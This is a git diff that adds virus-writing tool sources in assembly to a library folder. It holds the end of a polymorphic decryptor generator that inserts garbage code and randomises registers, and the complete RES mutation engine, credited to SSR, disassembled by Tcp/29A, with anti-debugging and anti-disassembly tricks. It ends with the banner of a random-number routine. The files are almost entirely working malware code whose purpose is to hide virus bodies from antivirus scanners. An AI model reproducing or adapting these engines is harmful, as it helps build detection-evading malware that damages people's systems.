+					;
+					; ASSEMBLE MOVE DATA LOOP 
+					;
+					;  this loop is used when data are decrypted 
+					;  to different location in memory than their initial position is
+					;  to activate this behaviour , set poly_vars.poly_ptr_decrypt_buf_va  
+					call Asm_Move_Data_Loop
+					 
+					;
+					; INIT VALUES FOR DECRYPTOR
+					;
+					
+					; init decrypt key in reg
+					mov ebx,dword ptr [ebp].poly_key_reg
+					mov ecx,dword ptr [ebp].poly_key
+					call Asm_Mov_Reg_Imm_32
+					
+					; GARBLE
+					call PolyGarble
+					
+					; init decrypt buffer ptr
+					mov ecx,dword ptr [ebp].poly_ptr_decrypt_buf_va
+					test ecx,ecx
+					jnz @f
+					mov ecx,dword ptr [ebp].poly_ptr_code_base_va
+@@:					mov ebx,dword ptr [ebp].poly_ptr_reg 
+					add ecx,dword ptr [ebp].poly_code_size
+					dec ecx
+					call Asm_Init_Ptr
+					
+					
+					; GARBLE
+					call PolyGarble
+					
+					; init loop counter 
+					mov ebx,dword ptr [ebp].poly_loop_reg
+					mov ecx,dword ptr [ebp].poly_code_size
+					call Asm_Mov_Reg_Imm_32
+					
+					; GARBLE
+					call PolyGarble
+					
+					call Set_In_Loop ; set in-loop garbler state 
+					
+					; GENERATE POLY DECRYPTION LOOP
+					mov esi,edi  ; loop_base
+					
+					call PolyGarble 
+					 
+					; OPERATION (xor/add/sub [ptr_reg],key_reg )
+					mov eax,290131h
+					mov ecx,dword ptr [ebp].poly_algo1
+					imul ecx,8
+					ror eax,cl
+					mov byte ptr [edi],al
+				 
+					; (key_reg << 3) + ptr_reg;
+					mov eax,dword ptr [ebp].poly_key_reg
+					rol eax,3
+					add eax,dword ptr [ebp].poly_ptr_reg
+					mov byte ptr [edi + 1],al
+					add edi,2
+					
+					; GARBLE
+					call PolyGarble
+					
+					; KEY SLIDE (xor/add/sub key_reg,slide_key)
+					mov byte ptr [edi],081h
+					
+					mov eax,050006h ; ( xor/add/sub )
+					mov ecx,dword ptr [ebp].poly_algo2
+					imul ecx,8
+					ror eax,cl
+					rol eax,3
+					add eax,dword ptr [ebp].poly_key_reg
+					add eax,0c0h
+					mov byte ptr [edi + 1],al
+			
+					mov eax,dword ptr [ebp].poly_slide_key
+					mov dword ptr [edi + 2],eax
+					add edi,6
+					
+					; GARBLE
+					call PolyGarble
+					
+					; dec ptr 
+					mov eax,48h
+					add eax,dword ptr [ebp].poly_ptr_reg
+					stosb
+					
+					; GARBLE
+					call PolyGarble
+					
+					; ASSEMBLE LOOP
+					 
+					; dec counter reg
+					mov eax,48h
+					add eax,dword ptr [ebp].poly_loop_reg
+					stosb
+					
+	;
+	;	Decrypt Loop 
+	;				
+					; test counter reg 
+					mov al,085h
+					stosb
+					
+					mov eax,dword ptr [ebp].poly_loop_reg
+					rol eax,3
+					add eax,dword ptr [ebp].poly_loop_reg
+					add eax,0c0h
+					stosb 
+					
+					; jcc loop
+					mov eax,esi ; esi = loop start 
+					sub eax,edi
+					push eax
+					not eax
+					cmp eax,255 / 2
+					pop eax 
+					jbe Poly_Loop_Short 
+	; near jcc 		
+					sub eax,6			
+					mov word ptr [edi],0850fh
+					mov dword ptr [edi + 2],eax
+					add edi,6 
+					
+					jmp Poly_Loop_Cont
+	; short jcc 				
+Poly_Loop_Short:			sub eax,2
+					mov byte ptr [edi],75h ; jnz
+					mov byte ptr [edi + 1],al
+					add edi,2
+					
+Poly_Loop_Cont: 			call Set_In_Loop ; unset in-loop garbler state 
+					
+					; free regs used in decrypt loop
+					mov eax,dword ptr [ebp].poly_key_reg
+					call unset_reg_32
+					
+					mov eax,dword ptr [ebp].poly_ptr_reg
+					call unset_reg_32
+					
+					mov eax,dword ptr [ebp].poly_loop_reg
+					call unset_reg_32
+					
+					; GARBLE
+					call PolyGarble
+
+ifndef POLY_DEBUG 					
+					; GENERATE JUMP TO NEXT LAYER 
+					call Asm_Jmp_Next_Layer
+
+else				
+					mov ax,0c35dh
+					stosw
+endif ; POLY_DEBUG 					
+					
+					
+					mov eax,edi
+					sub eax,dword ptr [ebp].poly_decryptor_base
+					mov dword ptr [esp + 1ch],eax
+					
+					popad 
+					retn
+;
+;	Assemble Mov Reg,Imm32 
+;
+
+; in:
+; 	ebx = reg
+; 	ecx = value 
+; 	edi = buffer
+Asm_Mov_Reg_Imm_32: 			mov eax,3
+					call random
+					
+					cmp eax,0
+					je mov_lea
+					
+					cmp eax,1
+					je mov_push_pop   
+
+					; mov reg imm32 
+mov_reg_imm32:				mov byte ptr [edi],0b8h
+					add byte ptr [edi],bl
+					mov dword ptr [edi + 1],ecx
+					add edi,5
+					retn
+					
+mov_push_pop:				mov al,68h
+					stosb
+					mov eax,ecx
+					stosd
+					mov eax,ebx
+					add eax,58h
+					stosb											
+					retn
+					
+mov_lea:				mov eax,ebx
+					rol eax,11
+					add eax,058dh
+					stosw
+					
+					mov eax,ecx
+					stosd
+					retn 					
+					
+;
+;	Create Poly Delta Routine
+;
+
+; eax = register
+; edi = buffer
+ 
+Asm_Poly_Delta:				push ebx
+					push ecx
+					
+					mov ecx,eax
+					mov byte ptr [edi],0e8h
+					inc edi 
+					mov ebx,edi
+					stosd
+					
+					call Set_In_Pred ; avoid ptr init in delta call 
+					 
+					call PolyGarble
+					
+					call Set_In_Pred 
+					
+					mov eax,edi
+					sub eax,ebx
+					sub eax,4
+					mov dword ptr [ebx],eax
+					add ebx,3 ; not 4   
+					
+					mov eax,ecx
+					add al,58h
+					stosb  
+					
+					mov eax,ecx
+					add al,0c0h
+					rol eax,8
+					add eax,081h
+					stosw 
+					
+					mov eax,ebx ; ebx = call delta + 5 
+					sub eax,dword ptr [ebp].poly_decryptor_base
+					add eax,dword ptr [ebp].poly_decryptor_base_va
+					not eax
+					stosd
+					
+					pop ecx
+					pop ebx 	 			
+					retn
+					
+;
+;	Initialize Pointer Register 
+;					
+
+;ebx = reg 
+;ecx = value 
+;edi = buffer 
+
+Asm_Init_Ptr:    			mov eax,dword ptr [ebp].poly_options
+					and eax,POLY_OPT_POS_INDEPENDENT
+					test eax,eax
+					jz Asm_Init_No_Delta
+					
+					mov eax,ebx
+;					push edx
+;					mov edx,dword ptr [ebp].poly_decryptor_base_va
+					call Asm_Poly_Delta 
+;					pop edx 
+					
+					; add reg val
+					mov al,081h
+					mov ah,bl
+					add ah,0c0h
+					stosw
+					
+					mov eax,ecx
+					stosd
+					
+					retn  
+		
+Asm_Init_No_Delta:			call Asm_Mov_Reg_Imm_32				
+					retn
+
+;edi = buffer 					
+Asm_Jmp_Next_Layer:			push ebx
+					push ecx
+					push edx
+					
+					; if poly_decryptor_base_va isnt set 
+					; make the transfer instruction relative (call/jmp... rel32)
+					cmp dword ptr [ebp].poly_ptr_decrypt_buf_va,0
+					je Asm_Relative
+					
+					call get_free_reg_32	
+					mov ebx,eax
+					
+					mov ecx,dword ptr [ebp].poly_ptr_decrypt_buf_va
+					test ecx,ecx
+					jnz @f
+					mov ecx,dword ptr [ebp].poly_ptr_code_base_va
+@@:					add ecx,dword ptr [ebp].poly_code_entry_offset
+					
+					mov eax,dword ptr [ebp].poly_options
+					and eax,POLY_OPT_POS_INDEPENDENT
+					test eax,eax 
+					jnz Asm_Jmp_Layer_Delta 
+					
+					call Asm_Mov_Reg_Imm_32
+					
+					jmp Asm_Jmp_C
+					
+Asm_Jmp_Layer_Delta:			mov eax,ebx
+;					mov edx,dword ptr [ebp].poly_ptr_code_base_va
+					call Asm_Poly_Delta
+					
+					mov al,81h
+					stosb
+					mov eax,0c0h
+					add eax,ebx 
+					stosb 
+					
+					mov eax,ecx 
+					stosd 
+					
+Asm_Jmp_C:				mov eax,50h
+					add eax,ebx
+					stosb
+					
+					call PolyGarble 
+					
+					mov eax,0c3h
+					stosb
+				
+@@:					pop edx 
+					pop ecx
+					pop ebx 
+					retn
+
+					; call rel32					
+Asm_Relative:				mov al,0e8h
+					stosb
+					mov eax,dword ptr [ebp].poly_ptr_code_base_raw
+					add eax,dword ptr [ebp].poly_code_entry_offset
+					sub eax,edi
+					sub eax,4
+					stosd 
+					
+					call PolyGarble
+					call PolyGarble
+					mov eax,0c3h
+					stosb
+					jmp @b
+					 
+;
+;	Assemble Move Data Loop 
+;					
+Asm_Move_Data_Loop:			pushad
+					cmp dword ptr [ebp].poly_ptr_decrypt_buf_va,0
+					je Asm_Move_Data_End
+					
+					; init store reg
+					call get_free_reg_32
+					cmp eax,-1
+					je Asm_Move_Data_End ; we got problem here
+					mov dword ptr [ebp].poly_store_reg,eax
+					
+					call PolyGarble
+					
+					; init src ptr
+					mov ebx,dword ptr [ebp].poly_ptr_reg
+					mov ecx,dword ptr [ebp].poly_ptr_code_base_va
+					call Asm_Init_Ptr
+					
+					call PolyGarble
+					
+					; init dest ptr
+					mov ebx,dword ptr [ebp].poly_key_reg
+					mov ecx,dword ptr [ebp].poly_ptr_decrypt_buf_va
+					call Asm_Init_Ptr
+					
+					call PolyGarble 
+					
+					; init counter 
+					mov ebx,dword ptr [ebp].poly_loop_reg
+					mov ecx,dword ptr [ebp].poly_code_size
+					shr ecx,2 
+					inc ecx
+					call Asm_Mov_Reg_Imm_32
+					
+					call Set_In_Loop
+					
+					mov ebx,edi ; loop start
+					
+					call PolyGarble  
+					
+					; mov store_reg/[scr]
+					mov eax,dword ptr [ebp].poly_store_reg
+					rol eax,3
+					add eax,dword ptr [ebp].poly_ptr_reg
+					rol eax,8
+					add eax,8bh
+					stosw
+					
+					; mov [dest]/store_reg
+					mov eax,dword ptr [ebp].poly_store_reg 
+					rol eax,3
+					add eax,dword ptr [ebp].poly_key_reg
+					rol eax,8
+					add eax,089h
+					stosw 
+					
+					call PolyGarble  
+					
+					; inc store_reg
+					mov eax,dword ptr [ebp].poly_ptr_reg
+					add eax,0c0h
+					rol eax,8
+					add eax,83h
+					stosw
+					
+					mov al,4h
+					stosb 
+					
+					call PolyGarble
+					 
+					mov eax,dword ptr [ebp].poly_key_reg
+					add eax,0c0h
+					rol eax,8
+					add eax,83h
+					stosw
+					
+					mov al,4h
+					stosb 
+					
+					call PolyGarble 
+					
+					; dec loop_counter
+					mov eax,dword ptr [ebp].poly_loop_reg
+					add eax,48h
+					stosb 
+					
+					call PolyGarble 
+					
+					; test loop_counter/loop_counter
+					mov eax,dword ptr [ebp].poly_loop_reg
+					rol eax,3
+					add eax,dword ptr [ebp].poly_loop_reg
+					add eax,0c0h
+					rol eax,8
+					add eax,085h
+					stosw 
+					
+					; jcc loop
+					mov eax,ebx 
+					sub eax,edi
+					push eax
+					not eax
+					cmp eax,255 / 2
+					pop eax 
+					jbe Move_Loop_Short 
+					
+					; near jcc 		
+					sub eax,6			
+					mov word ptr [edi],0850fh
+					mov dword ptr [edi + 2],eax
+					add edi,6 
+					
+					jmp @f
+					
+					; short jcc 				
+Move_Loop_Short:			sub eax,2
+					mov byte ptr [edi],75h ; jnz
+					mov byte ptr [edi + 1],al
+					add edi,2
+@@:					
+					call Set_In_Loop ; unset loop state flag  
+					
+					mov eax,dword ptr [ebp].poly_store_reg
+					call unset_reg_32 ; free store reg 
+					
+					mov dword ptr [esp],edi ; store edi
+					
+;					mov eax,dword ptr [ebp].poly_ptr_decrypt_buf_va
+;					mov dword ptr [ebp].poly_ptr_code_base_va,eax  
+Asm_Move_Data_End:			popad 
+					retn 					
+					
+;
+;	Auxiliary routines
+;	
+
+generate_key_32:			push ecx
+					push ebx
+					mov ecx,4
+					
+generate_key_loop:			mov eax,0ffh - 10
+					call random 
+					add eax,10
+					mov bl,al
+					rol ebx,8
+					dec ecx                
+					test ecx,ecx			; to avoid permutation errors
+					jnz generate_key_loop
+					mov eax,ebx
+					pop ebx
+					pop ecx
+					retn
+					
+;
+;	Test Flag 
+;
+
+; eax > 0 => we are in loop already
+Is_In_Loop:				mov eax,POLY_FLAG_IN_LOOP
+					jmp Test_Flag 
+					 
+Set_In_Loop: 				push eax
+					mov eax,POLY_FLAG_IN_LOOP
+					jmp Set_Flag
+					
+Is_In_Subr:				mov eax,POLY_FLAG_IN_SUBR
+					jmp Test_Flag 
+					
+Set_In_Subr:				push eax
+					mov eax,POLY_FLAG_IN_SUBR
+					jmp Set_Flag
+				
+Is_In_Pred:				mov eax,POLY_FLAG_IN_PRED
+					jmp Test_Flag 
+
+Set_In_Pred:				push eax
+					mov eax,POLY_FLAG_IN_PRED
+					jmp Set_Flag			
+					
+Test_Flag:          			push ebx
+					mov ebx,dword ptr [ebp].poly_garbler_flags
+					and ebx,eax
+					mov eax,ebx
+					pop ebx
+					retn
+
+Set_Flag:				xor dword ptr [ebp].poly_garbler_flags,eax
+					pop eax
+					retn
+	
+;
+;	Registers handling functions 
+;
+
+; eax = reg
+convert_32:         			push ecx
+					mov ecx,eax
+					xor eax,eax
+					inc eax
+					rol eax,cl
+					pop ecx
+					retn
+
+set_reg_32:				push eax
+					call convert_32
+					or dword ptr [ebp].poly_reg_usage,eax
+					pop eax
+					retn
+					
+unset_reg_32:				push eax
+					call convert_32
+					xor dword ptr [ebp].poly_reg_usage,eax
+					pop eax
+					retn
+
+; if eax != 0 , reg is used already					
+is_used_32:         			push ebx
+					call convert_32
+					mov ebx,eax
+					mov eax,dword ptr [ebp].poly_reg_usage
+					and eax,ebx
+					pop ebx
+					retn
+
+; if eax after ret is zero , no regs are avaiable 					
+is_any_free_32:    			mov eax,dword ptr [ebp].poly_reg_usage
+					not eax
+					and eax,0ffh
+					retn
+
+get_reg_32:				mov eax,8
+					call random
+					retn
+					
+get_reg_32_no_stack:mov eax,6
+					call random
+					cmp eax,4
+					je get_reg_32_add
+					cmp eax,5
+					je get_reg_32_add
+					retn
+
+get_reg_32_add:     			add eax,2
+					retn
+
+;
+; return unused reg32 or -1 if no regs are avaiable
+get_free_reg_32:			call is_any_free_32
+					test eax,eax
+					jz no_reg_avaiable_32
+					
+get_another_reg_32:			call get_reg_32
+					push eax
+					call is_used_32
+					test eax,eax
+					pop eax
+					jnz get_another_reg_32
+					
+					call set_reg_32 ; set reg as used 
+					retn 
+
+no_reg_avaiable_32: dec eax	
+					retn
+
+get_free_reg_32_no_set:
+					call get_free_reg_32
+					cmp al,0ffh
+					je get_free_reg_32_no_set_exit 
+					call unset_reg_32
+get_free_reg_32_no_set_exit:					
+					retn 					
+
+
+;
+;	Crypt Data
+;
+
+; add/sub must occur in reversed order according to decryption order
+; eax = key
+crypt_data:				pushad 
+					mov edi,dword ptr [ebp].poly_ptr_code_base_raw
+					mov ecx,dword ptr [ebp].poly_code_size
+					mov ebx,dword ptr [ebp].poly_slide_key
+					
+crypt_loop:				cmp dword ptr [ebp].poly_algo1,1
+					je crypt_algo1
+					
+					cmp dword ptr [ebp].poly_algo1,2
+					je crypt_algo2
+
+					xor dword ptr [edi],eax
+					jmp crypt_algo_c
+					
+crypt_algo1:     			sub dword ptr [edi],eax 
+					jmp crypt_algo_c
+					
+crypt_algo2:       			add dword ptr [edi],eax
+ 
+ 					; now apply slide key 
+crypt_algo_c:				mov dword ptr [esp+1Ch],eax ; save eax
+					cmp dword ptr [ebp].poly_algo2,1
+					je crypt_slide1
+					
+					cmp dword ptr [ebp].poly_algo2,2
+					je crypt_slide2		
+					
+					xor eax,ebx
+					jmp crypt_slide_c
+					
+crypt_slide1:				sub eax,ebx
+					jmp crypt_slide_c
+					
+crypt_slide2:				add eax,ebx
+
+crypt_slide_c: 				inc edi
+					loop crypt_loop
+
+;					mov dword ptr [esp+1Ch],eax ; save eax 
+					popad 
+					retn
+					
+;
+; 	random Routine 
+;
+
+; Entry: EAX == Max_Val.
+; Return: EAX == random  number between 0..Max_Val-1.
+; routine by T-2000
+		
+random:					push ecx
+    					push edx
+    					push eax
+
+					rdtsc
+					mov ecx,dword ptr [ebp].poly_random_seed ; random  seed 
+					add eax,ecx
+
+					rol ecx, 1
+					add ecx, 666h
+					mov dword ptr [ebp].poly_random_seed,ecx ; random  seed 
+
+					push 32
+					pop ecx
+
+CRC_Bit_1:		    		shr eax, 1
+    					jnc Loop_CRC_Bit_1
+    					xor eax,0EDB88320h
+
+Loop_CRC_Bit_1:   			loop CRC_Bit_1                
+    					pop ecx
+    					xor edx,edx
+    					div ecx
+
+					xchg edx,eax
+					or eax,eax
+
+					pop edx
+					pop ecx
+					retn 
+
+
+					assume ebp:nothing 
diff --git a/libs/VirTool.Win32.Cryptor.RES.ASM b/libs/VirTool.Win32.Cryptor.RES.ASM
new file mode 100644
index 00000000..05f3ff78
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.RES.ASM
@@ -0,0 +1,458 @@
+; - -[RES.ASM]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
+;
+; Random Encryption Synthezator (RES), by SSR
+; Disasm by Tcp/29A (tcp@cryogen.com)
+;
+;
+; Entry:
+;  DS:DX = code
+;  BX = runtime offset
+;  CX = number of bytes to encrypt
+; Return:
+;  DS:DX = encryptor+code
+;  CX = size encryptor+code
+
+
+                .386p
+                RES    segment use16
+                assume cs:RES, ds:RES, es:RES, ss:RES
+                org    0
+
+RES_SIZE_DEC    equ     300h    ; But it only needs 169h
+
+res_engine:
+start:
+		call    res_delta
+res_delta:
+		pop     si
+                sub     si,3            ; Get delta-offset
+		pop     ax
+		push    cs
+		push    ax
+		push    es
+		mov     ax,es
+		sub     ax,10h
+		mov     es,ax
+		mov     di,100h
+		push    cx
+                mov     cx,offset(end_res)
+		nop
+		push    ds
+		push    cs
+		pop     ds
+		cld
+                rep     movsb           ; Copy RES code to working area
+		pop     ds
+		pop     cx
+		mov     ax,offset(res_start+100h)
+		push    es
+		push    ax
+                retf                    ; jmp res_start
+
+res_start:
+		pop     es
+		mov     si,100h
+		mov     ax,es
+                add     ax,(end_res-start+15)/16+1
+                mov     es,ax           ; Calculate base segment for decryptor
+                mov     cs:[si+runtime_ofs],bx
+                mov     cs:[si+code_length],cx
+		push    cx
+                mov     cx,RES_SIZE_DEC
+		xor     di,di
+		mov     al,90h          ; NOP
+		cld     
+		rep     stosb           ; Fill with NOPs
+		call    init_masks
+		mov     cx,8            ; 8 instructions per decryptor
+		xor     di,di
+		add     di,si
+l_select_instructions:
+		push    cx
+		call    RES_get_random
+		mov     ah,0
+		push    cx
+		mov     cl,5
+		shr     al,cl           ; AX in [0..7]
+		shl     ax,1
+		shl     ax,1            ; AX:=AX*4 (4 bytes per instruction)
+		pop     cx
+		push    di
+		push    si
+		add     di,offset(buffer_decryptor)
+		add     si,offset(decryptor_table)
+		add     si,ax
+		push    ax
+                mov     ax,cs:[si]      ; Select an instruction for decryptor
+                mov     cs:[di],ax      ; and store it
+		mov     ax,cs:[si+2]
+		mov     cs:[di+2],ax
+		pop     ax
+		pop     si
+		pop     di
+		push    di
+		push    si
+		add     di,offset(buffer_encryptor)
+		add     si,offset(encryptor_table)
+		add     si,ax
+		push    ax
+                mov     ax,cs:[si]      ; Select the instruction for encryptor
+		mov     cs:[di],ax      ; and store it
+		mov     ax,cs:[si+2]
+		mov     cs:[di+2],ax
+		pop     ax
+		pop     si
+		pop     di
+		add     di,4
+		pop     cx
+                loop    l_select_instructions
+                call    reverse_decryptor_table
+                call    make_encryptor
+		pop     cx
+		push    cx
+		mov     bp,dx
+                mov     di,RES_SIZE_DEC
+		mov     cs:[si+code_CRC],0
+l_encrypt_code:
+		mov     al,ds:[bp]
+		mov     es:[di],al
+		mov     ah,0
+		add     cs:[si+code_CRC],ax     ; Make code CRC
+
+encryptor       db      8*4 dup(90h)            ; Buffer for encryptor
+
+                inc     di
+		inc     bp
+		loop    l_encrypt_code
+		push    ds
+		push    cs
+		pop     ds
+		xor     di,di
+		push    si
+                add     si,offset(decryptor_code)
+                mov     cx,decrypted_code-decryptor_code
+		nop     
+		cld     
+		rep     movsb           ; Copy decryptor to buffer
+		pop     si
+		pop     ds
+		push    es
+		pop     ds
+                xor     dx,dx           ; DS:DX = Address of decryptor+code
+		pop     cx
+                add     cx,RES_SIZE_DEC ; Decryptor+encrypted code
+		retf    
+
+		db      0
+		db      'RandomEncryptionSynthezator',0
+		db      'ь S.S.R. 1996-97',0
+
+init_masks:
+		push    si
+                mov     cx,3    ; Only first 3 instructions need a mask
+l_next_mask:
+		call    RES_get_random
+                mov     byte ptr cs:[si+decryptor_table+3],al   ; Store mask
+                mov     byte ptr cs:[si+encryptor_table+3],al
+                add     si,4                                    ; Next inst.
+		loop    l_next_mask
+		pop     si
+		ret     
+
+RES_get_random:
+		pushf   
+		in      al,40h         ; Get random number
+		ror     al,1
+		xor     al,53h
+		popf    
+		ret     
+
+make_encryptor:
+		push    es
+		push    ds
+		push    cs
+		pop     es
+		push    cs
+		pop     ds
+		push    si
+		in      al,40h          ; Get random number
+		mov     cx,8
+                mov     di,offset(encryptor)
+		add     di,si
+                add     si,offset(buffer_encryptor)
+l_make_encryptor:
+                rcr     al,1            ; Add instruction to encryptor?
+		jc      add_instruction ; Yes? then jmp
+		nop     
+		nop     
+		add     si,4
+loop_make_encryptor:
+                loop    l_make_encryptor
+                jmp     encryptor_done
+		nop     
+
+add_instruction:
+		cld     
+		push    cx
+		mov     cx,4
+		rep     movsb           ; Store instruction
+		pop     cx
+                jmp     loop_make_encryptor
+
+encryptor_done:
+		pop     si
+		pop     ds
+		pop     es
+		ret     
+
+reverse_decryptor_table:
+		push    ax
+		push    bp
+		push    di
+		push    cx
+		push    bx
+                mov     cx,8/2
+		mov     di,offset(buffer_decryptor)
+		add     di,si
+                mov     bp,offset(end_buffer_dec)-4     ; Point to last inst.
+		add     bp,si
+l_reverse_table:
+                mov     ax,cs:[di]      ; Xchg instructions
+		mov     bx,cs:[bp]
+		mov     cs:[di],bx
+		mov     cs:[bp],ax
+		mov     ax,cs:[di+2]
+		mov     bx,cs:[bp+2]
+		mov     cs:[di+2],bx
+		mov     cs:[bp+2],ax
+                sub     bp,4            ; xchg next instruction
+		add     di,4
+                loop    l_reverse_table
+		pop     bx
+		pop     cx
+		pop     di
+		pop     bp
+		pop     ax
+		ret     
+
+                db      4               ; Unused !!
+
+decryptor_code:
+runtime_ofs     equ     word ptr $+1
+                mov     bp,0                    ; mov bp,runtime_ofs
+                push    1100h+(90h+3Ch-20h)
+                sub     bp,offset(decryptor_code)
+                mov     di,offset(decryptor)
+		add     di,bp
+                pop     ax                      ; AX:=1100h+(90h+3Ch-20h)
+                inc     cs:[bp+n_decryptors]    ; Inc # of tested decryptors
+		mov     cs:[bp+decryptor_ok],0  ; Decryptor not found
+		mov     cs:[bp+decrypting],0    ; Not decrypting
+		mov     cx,20h
+		push    es
+		push    ds
+		add     ax,cx
+		push    cs
+		pop     es
+		push    cs
+		pop     ds
+		cld     
+		dec     cx
+		sub     al,3Ch                  ; AL:=90h (NOP)
+		rep     stosb
+		add     al,3Ch                  ; AL:=0CCh (int 3)
+		stosb
+                cmp     cs:[bp+n_decryptors],150 ; < 150 decryptors tested?
+                jb      create_random_decryptor  ; Yes? then jmp
+		nop     
+		nop     
+                mov     ax,cs:[bp+n_decryptors] ; Don't use a random number.
+                                ; n_decryptors will be increased, so it'll
+                                ; find the correct decryptor.
+		jmp     create_decryptor
+		nop     
+
+                db      66h             ; Unused!? (antidebug??)
+
+create_random_decryptor:
+		in      al,40h          ; Get random number
+create_decryptor:
+                mov     cs:[bp+decryptor_id],al ; Why? Never use it!!
+		mov     cx,8
+                mov     si,offset(buffer_decryptor)
+		add     si,bp
+                mov     di,offset(decryptor)
+		add     di,bp
+l_make_random_decryptor:
+		rcr     al,1            ; Add instruction to decryptor?
+		jc      add_inst_dec    ; Yes? then jmp
+		nop     
+		nop     
+		add     si,4
+next_dec_instruction:
+		loop    l_make_random_decryptor
+		jmp     done_random_decryptor
+		nop     
+
+add_inst_dec:
+		cld     
+		push    cx
+		mov     cx,4
+		rep     movsb           ; Add instruction
+		pop     cx
+		jmp     next_dec_instruction
+
+done_random_decryptor:
+                mov     di,RES_SIZE_DEC
+                add     di,cs:[bp+runtime_ofs]
+code_length     equ     word ptr $+1
+                mov     cx,0                    ; mov cx,code_length
+                mov     bx,cs:[bp+code_CRC]
+l_random_decryptor:
+		mov     dl,cs:[di]
+
+decryptor       db      8*4 dup(90h)
+
+                mov     al,dl
+		mov     ah,0
+		sub     bx,ax                   ; Calculate CRC
+		cmp     cs:[bp+decrypting],1    ; Decrypting?
+		je      decrypt_byte            ; Yes? then jmp
+		nop     
+		nop     
+loop_decryptor:
+		inc     di
+		loop    l_random_decryptor
+		pop     ds
+		pop     es
+                cmp     bx,0                    ; CRC OK?
+                jnz     decryptor_code          ; No? then jmp
+                jmp     found_decryptor         ; Yes? then jmp
+		nop     
+
+buffer_decryptor db     8*4 dup(90h)
+end_buffer_dec:
+
+code_CRC        dw      0
+decryptor_ok    db      0
+decrypting      db      0
+                db      0Bh     ; Unused!
+                db      0Bh     ; Unused!
+                db      0Bh     ; Unused!
+decryptor_id    db      0                
+n_decryptors    dw      0
+
+decrypt_byte:
+		mov     cs:[di],dl      ; Store decrypted byte
+		jmp     loop_decryptor
+
+found_decryptor:
+		cmp     cs:[bp+decryptor_ok],1  ; Code decrypted?
+		je      code_decrypted          ; Yes? then jmp
+		nop     
+		nop     
+		mov     cs:[bp+decrypting],1
+		mov     cs:[bp+decryptor_ok],1
+		push    es
+		push    ds
+		jmp     done_random_decryptor   ; Decrypt code
+
+code_decrypted:
+		jmp     anti_disasm1
+		nop     
+                db      69h             ; Antidebug
+anti_disasm1:
+		cli
+		push    3545h
+		jmp     anti_disasm2
+		nop
+                db      0EAh            ; Antidebug
+anti_disasm2:
+		cli
+		inc     sp
+                mov     ax,cs:[bp]
+		xor     ax,bx
+		cld     
+		scasb
+		inc     sp
+		mov     ax,4202h
+		sub     sp,2
+		pop     ax
+                cmp     ax,3545h        ; Is it being traced?
+                jne     decrypted_code  ; Yes? then jmp
+                                        ; BUG! Should jump when not traced
+		nop     
+                nop
+                xor     ax,3445h
+		mov     es,ax
+		inc     byte ptr cs:[0Dh]
+		and     cx,0Fh
+		rep     scasb
+		xor     ax,cs:[si]
+		pushf   
+                pop     ax                      ; Get flags
+                and     ah,0FEh                 ; Clear trace flag
+		push    ax
+		xchg    bx,cx
+		les     bx,ds:[2Bh]
+                popf                            ; Trace flag off
+		xor     eax,eax
+                mov     dr7,eax                 ; Clear all breakpoints
+		dec     byte ptr cs:[0Dh]
+                call    skip_reset
+                db      0EAh    ; jmp far ptr 0F000h:0FFF0h (reset)
+                dw      0FFF0h  ;  but never reach here because in 'skip_reset'
+                dw      0F000h  ;  it does a pop of the return address
+
+skip_reset:
+		pop     ax
+decrypted_code:                 ; End of decryptor code
+
+encryptor_table:
+		xor     byte ptr es:[di],0
+		add     byte ptr es:[di],0
+		sub     byte ptr es:[di],0
+		nop     
+		ror     byte ptr es:[di],1
+		nop     
+		rol     byte ptr es:[di],1
+		nop     
+		neg     byte ptr es:[di]
+		nop     
+		not     byte ptr es:[di]
+		nop     
+		neg     byte ptr es:[di]
+
+decryptor_table:
+		nop
+		xor     dl,0
+		nop     
+		sub     dl,0
+		nop     
+		add     dl,0
+		nop     
+		nop     
+		rol     dl,1
+		nop     
+		nop     
+		ror     dl,1
+		nop     
+		nop     
+		neg     dl
+		nop     
+		nop     
+		not     dl
+		nop     
+		nop     
+		neg     dl
+
+buffer_encryptor db     8*4 dup(90h)
+
+end_res:
+
+RES             ends
+public          res_engine
+                end
+
+; End of RES disasm
+; (c) 1997, Tcp/29A (tcp@cryogen.com)
diff --git a/libs/VirTool.Win32.Cryptor.Random.asm b/libs/VirTool.Win32.Cryptor.Random.asm
new file mode 100644
index 00000000..3fd8fe86
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.Random.asm
@@ -0,0 +1,88 @@
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;                                                                                                   
+;                                                                                                        ;
+;                                                                                                        ;
+;      xxxxxxxxxxx      xxxxxxxx     xxxx    xxxx     xxxxxxxxxx          xxxxxxxx      xxxxxxxxx        ;  
+;      xxxxxxxxxxxx    xxxx  xxxx    xxxx    xxxx    xxxxxxxxxxx         xxxxxxxxxx    xxxxxxxxxxx       ; 
+;      xxxx    xxxx   xxxx    xxxx   xxxxx   xxxx   xxxx    xxxx         xxx    xxxx   xxx    xxxx       ;    
+;      xxxx    xxxx   xxxx    xxxx   xxxxxx  xxxx   xxxx                        xxxx          xxxx       ;   
+;      xxxx    xxxx   xxxx    xxxx   xxxxxxx xxxx   xxxx                   xxxxxxxx     xxxxxxxxxx       ;   
+;      xxxxxxxxxxx    xxxx xx xxxx   xxxx xxxxxxx   xxxx                   xxxxxxxx    xxxxxxxxxx        ;  
+;      xxxxxxxxxxxx   xxxx xx xxxx   xxxx  xxxxxx   xxxx   xxxxx                xxxx   xxxx              ;     
+;      xxxx    xxxx   xxxx    xxxx   xxxx   xxxxx   xxxx    xxxx                xxxx   xxxx    xxx       ;   
+;      xxxx    xxxx   xxxx    xxxx   xxxx    xxxx    xxxxxxxxxxx         xxxxxxxxxx    xxxxxxxxxxx       ;   
+;      xxxx    xxxx   xxxx    xxxx   xxxx    xxxx     xxxxxxxxxx         xxxxxxxxx     xxxxxxxxxxx       ;   
+;                                                                                                        ;
+;                                                                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                               RAndom Numbers Generator                                                 ; 
+;                                                                                                        ;
